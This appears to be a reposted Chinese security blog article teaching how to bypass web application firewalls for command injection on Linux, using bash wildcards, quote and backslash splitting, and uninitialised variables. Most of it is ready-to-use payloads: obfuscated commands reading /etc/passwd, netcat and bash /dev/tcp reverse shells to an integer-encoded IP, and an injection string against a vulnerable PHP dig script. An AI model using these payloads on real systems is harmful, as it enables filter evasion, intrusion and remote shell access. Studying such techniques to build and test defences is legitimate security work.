命令执行WAF绕过技巧总结

2018 年 10 月 2 日 FreeBuf

*本文作者:zusheng,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

前言

如今市面上的WAF几乎都已经具备了针对RCE攻击的防御能力,这些WAF并不是想象中毫无破绽,当Web服务器是Linux平台时我们就可以利用一些技巧来绕过WAF规则集。本文主要总结Linux平台下针对RCE WAF的绕过技巧,Windows平台不在本文考虑范围内。

0x01 技巧一:通配符

在bash的操作环境中有一个非常有用的功能,那就是通配符,下面列出一些常用的通配符:

*    代表『 0 个到无穷多个』任意字符
?    代表『一定有一个』任意字符
[ ]    同样代表『一定有一个在括号内』的字符(非任意字符)。例如 [abcd] 代表『一定有一个字符, 可能是 a, b, c, d 这四个任何一个』
[ - ]    若有减号在中括号内时,代表『在编码顺序内的所有字符』。例如 [0-9] 代表 0 到 9 之间的所有数字,因为数字的语系编码是连续的!
[^ ]    若中括号内的第一个字符为指数符号 (^) ,那表示『反向选择』,例如 [^abc] 代表 一定有一个字符,只要是非 a, b, c 的其他字符就接受的意思。

我们可以使用通配符来执行命令,例如执行命令:

ls -l
使用通配符
/?in/?s -l

读取/etc/passwd:

/???/??t /??c/p???w?
有时候WAF不允许使用太多的?号
/?in/cat /?tc/p?sswd

NC反弹shell:

nc -e /bin/bash 127.0.0.1 3737
为了避免符号.我们可以将IP地址转换成整型。
127.0.0.1 → 2130706433

使用通配符

root@kali:~# /??n/?c -e /??n/b??h 2130706433 3737

0x02 技巧二:连接符

在bash的操作环境中还有一个非常有用的功能,那就是连接符,例如:

root@kali:~# echo hello
hello
root@kali:~# echo h'ello
> '
hello

root@kali:~# echo 'h'ell'o'
hello

你唯一需要注意的就是闭合,这点很重要,利用这个我们可以绕过一些匹配字符串的WAF规则。

读取/etc/passwd:

/'b'i'n'/'c'a't' /'e't'c'/'p'a's's'w'd

获取shell

检测NC:

/'b'i'n'/'w'h'i'c'h' 'n'c

没有NC的情况检查wget:

/'b'i'n'/'w'h'i'c'h' 'w'g'e't

简单粗暴(容易被检查):

bash -c 'sh -i &>/dev/tcp/2130706433/3737 0>&1'

其他字符:

双引号
/"b"i"n"/"w"h"i"c"h" "n"c

反斜杆
/b\i\n/w\h\i\c\h n\c

0x03 技巧三:未初始化的bash变量

在bash环境中允许我们使用未初始化的bash变量,如何

$a,$b,$c

我们事先并没有定义它们,输出看看:

root@kali:~# echo $a

root@kali:~# echo $b

root@kali:~# echo $c

root@kali:~#

未初始化的变量值都是null。

读取/etc/passwd:

cat$a /etc$a/passwd$a

测试WAF

测试代码:

<?php
echo "OK";
system('dig '.$_GET['host']);
?>

www.baidu.com;$s/bin$s/which$s nc$s

反弹shell:

/bin$s/nc$s -e /bin$s/bash$s 2130706433 3737

执行:

成功:

0x04 总结

本文我们主要利用了bash的通配符、连接符、未初始化的变量三个特性来绕过WAF规则,当然你可能有更好的办法,欢迎大家补充,最后感谢乐于分享的安全研究员们,没他们的分享也不会有这么多技巧出现,谢谢分享。

*本文作者:zusheng,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

登录查看更多
0

相关内容

Bourne Again Shell 是一个由 Brian Fox 于 1989 年为 GNU 项目编写的、用于替代 Bourne Shell (sh) 的 UNIX shell 程序。 en.wikipedia.org/wiki/B
一份简明有趣的Python学习教程,42页pdf
专知会员服务
76+阅读 · 2020年6月22日
【实用书】Python技术手册,第三版767页pdf
专知会员服务
234+阅读 · 2020年5月21日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
117+阅读 · 2020年5月10日
用 Python 开发 Excel 宏脚本的神器
私募工场
26+阅读 · 2019年9月8日
Kali Linux 渗透测试:密码攻击
计算机与网络安全
16+阅读 · 2019年5月13日
介绍WAF以及过滤机制
黑白之道
22+阅读 · 2019年2月5日
如何编写完美的 Python 命令行程序?
CSDN
5+阅读 · 2019年1月19日
如何用GitLab本地私有化部署代码库?
Python程序员
9+阅读 · 2018年12月29日
一天精通无人中级篇:遥控器协议 S-BUS
无人机
51+阅读 · 2018年12月20日
Python | Jupyter导出PDF,自定义脚本告别G安装包
程序人生
7+阅读 · 2018年7月17日
实战 | 用Python做图像处理(三)
七月在线实验室
15+阅读 · 2018年5月29日
手把手教TensorFlow(附代码)
深度学习世界
15+阅读 · 2017年10月17日
Advances in Online Audio-Visual Meeting Transcription
Arxiv
4+阅读 · 2019年12月10日
Seeing What a GAN Cannot Generate
Arxiv
8+阅读 · 2019年10月24日
Arxiv
4+阅读 · 2018年10月31日
Arxiv
11+阅读 · 2018年4月25日
Arxiv
4+阅读 · 2018年2月13日
Arxiv
8+阅读 · 2018年1月19日
VIP会员
相关资讯
用 Python 开发 Excel 宏脚本的神器
私募工场
26+阅读 · 2019年9月8日
Kali Linux 渗透测试:密码攻击
计算机与网络安全
16+阅读 · 2019年5月13日
介绍WAF以及过滤机制
黑白之道
22+阅读 · 2019年2月5日
如何编写完美的 Python 命令行程序?
CSDN
5+阅读 · 2019年1月19日
如何用GitLab本地私有化部署代码库?
Python程序员
9+阅读 · 2018年12月29日
一天精通无人中级篇:遥控器协议 S-BUS
无人机
51+阅读 · 2018年12月20日
Python | Jupyter导出PDF,自定义脚本告别G安装包
程序人生
7+阅读 · 2018年7月17日
实战 | 用Python做图像处理(三)
七月在线实验室
15+阅读 · 2018年5月29日
手把手教TensorFlow(附代码)
深度学习世界
15+阅读 · 2017年10月17日
相关论文
Advances in Online Audio-Visual Meeting Transcription
Arxiv
4+阅读 · 2019年12月10日
Seeing What a GAN Cannot Generate
Arxiv
8+阅读 · 2019年10月24日
Arxiv
4+阅读 · 2018年10月31日
Arxiv
11+阅读 · 2018年4月25日
Arxiv
4+阅读 · 2018年2月13日
Arxiv
8+阅读 · 2018年1月19日
Top
微信扫码咨询专知VIP会员